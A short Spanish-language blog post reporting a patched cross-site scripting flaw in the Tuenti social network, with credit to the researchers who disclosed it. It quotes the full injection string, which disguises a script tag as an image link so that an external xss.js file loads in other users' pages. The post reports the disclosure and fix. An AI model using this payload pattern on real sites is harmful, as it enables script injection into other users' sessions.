Vulnerabilidad que permitía ejecución de código en Tuenti
Os comentabamos de un fallo en la seguridad de Tuenti que permitía la ejecución de código en los videos de Tuenti y hoy se ha solucionado otro que permitía la ejecución de código usando el truco para insertar imágenes en los mensajes de Tuenti. Tal como se hace eco en Meneame, Rubén Díaz y Sergio C. R. desvelan como se explotaba este fallo en Tuenti.
El fallo era una vulnerabilidad del tipo XSS que al escribir en cualquier tablón, blog, comentario o mensaje del Tuenti algo de la forma;
http://diazr.com/</script><script src=http ://diazr.com/xss.js defer=owned.jpg http://diazr.com/</script>
De esta forma se hacía creer a Tuenti que era una imágen y al intentar cargarla ejecutaría el contenido del archivo «xss.js», que podía ser cualquier gusano para tu ordenador o una simple broma para cambiar el estado del Tuenti (xss_status_tuenti.js)
La solución que ha puesto Tuenti ha sindo no permitir el truco para insertar imágenes en los mensajes de Tuenti, por lo que no permite insertar los cósigos de DimeQuien, así que de momento ya no se puede saber quién te visita en Tuenti
Deja una respuesta